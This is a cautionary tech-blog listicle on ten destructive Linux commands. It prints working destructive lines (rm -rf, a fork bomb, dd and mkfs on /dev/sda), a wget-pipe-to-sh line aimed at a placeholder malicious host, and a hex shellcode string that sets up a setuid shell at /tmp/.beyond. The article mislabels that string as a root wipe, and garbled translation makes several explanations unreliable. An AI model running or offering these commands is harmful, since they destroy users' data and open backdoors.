Connect with us

Hi, what are you looking for?

TOP LIST

10 Most Dangerous Linux Commands You Should Never Execute

Tech Viral
Well, if you have ever used a Linux operating system, then you might know that the platform is more independent than Windows. Linux is an open-source operating system and it provides users enough freedom to carry out the different operations. However, for first time users, operating Linux could be a challenging task and require some Linux training.

Just like on Windows, Linux also has lots of terminal commands to carry out different operations. However, unlike Windows, Linux won’t ask you for confirmation if you run any command that could damage your system. So, we recommend you to not use these commands at any cost.

10 Most Dangerous Linux Commands You Should Never Execute

So, in this article, we are going to share some of the dangerous Linux commands you should never run on Linux. So, let’s check out the deadly commands you should never run on a Linux computer.

1. rm -rf

The rm -rf command is one of the fastest ways to delete a folder and its contents. But a little typing error or ignorance can result in unrecoverable damage to the system. Some of the options used with the rm command are like Rm -r command deletes the folder recursively, even the empty folder. rm -f Command removes “only read the file ‘without asking. It also has the power to eliminate all files present in the root directory.

2.: () {: |: &} ;:

The above command is the fork bomb. It operates by defining a function called ”, which is called twice, once in the foreground and once in the background. It keeps running again and again until the system freezes.

3. command> / dev / sda

The above command writes the output of ‘command on the block / dev / sda . The above command writes raw data and all files on the block will be replaced with raw data, resulting in total loss of data in the block.

READ  Top 10 Best Canva Alternatives For Photo Editing

4. mv directory / dev / null

This command basically moves all the files to / dev / null, yes, it means that it simply disappear all the files from the system.

5. wget http: // malicious_source -O | sh

The above command will download a script from a malicious source and then run it on your system. The Wget command will download the script and sh command will run the downloaded script on your system.

6. Mkfs.ext3 / dev / sda

The above command will simply format the block ‘sda’ and you will definitely know that after running the above command your Block (Hard Disk Drive) will be reset to NEW! Without the data, leaving the system in unrecoverable phase.

7. > File

The above command is used to release the file content. If the above command is executed with a typing error or ignorance as “> xt.conf” will write the configuration file or any other system or configuration file.

8. ^ foo ^ bar

This command is used to edit the previous command without the need to retype the entire command again. But it can be really problematic if you do not take the risk to carefully check the change in the original command using ^ ^ foo bar command.

9. dd if = / dev / random of = / dev / sda

The above command will end as / dev / sda and write random data for the block. Of course! Your system would be left in an inconsistent and unrecoverable phase.

10. invisible Command

The following command is nothing more than the first command of this article ( rm-rf ). Here the codes are hidden in hex to an ignorant user can be fooled. Running the code below into your terminal and clear your root partition.

READ  5 Best Apps To Take Scrolling Screenshots On Android

This command here shows that the threat can be hidden and usually undetectable sometimes. You should be aware of what you are doing and what would be the result. Not compile / run code from an unknown source.

char esp[] __attribute__ ((section(“.text”))) /* e.s.p release */ = “xebx3ex5bx31xc0x50x54x5ax83xecx64x68″ “xffxffxffxffx68xdfxd0xdfxd9x68x8dx99″ “xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7″ “x56x04xf7x56x08xf7x56x0cx83xc4x74x56″ “x8dx73x08x56x53x54x59xb0x0bxcdx80x31″ “xc0x40xebxf9xe8xbdxffxffxffx2fx62x69″ “x6ex2fx73x68x00x2dx63x00″ “cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;”;

So, these are some of the dangerous Linux commands that you should avoid. You shouldn’t run this command at any cost. I hope this article helped you! Share it with your friends also.

Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

You May Also Like

INTERNET

YouTube is one of the huge platforms to watch and share videos of any type. Frequently times, you stumble upon a video which you...

INTERNET

Extratorrent, the most popular torrent site due to its huge database of torrent content. You can find and download here every type of torrent...

INTERNET

For some people, an antivirus app is worthless for their Android device. Common sense is more than enough to protect your phone from all...

COMPUTER

Stage 1: Gather your Materials and Resources For this project, you will need the following Tools: Hand drill (i love my dewalt) and bits...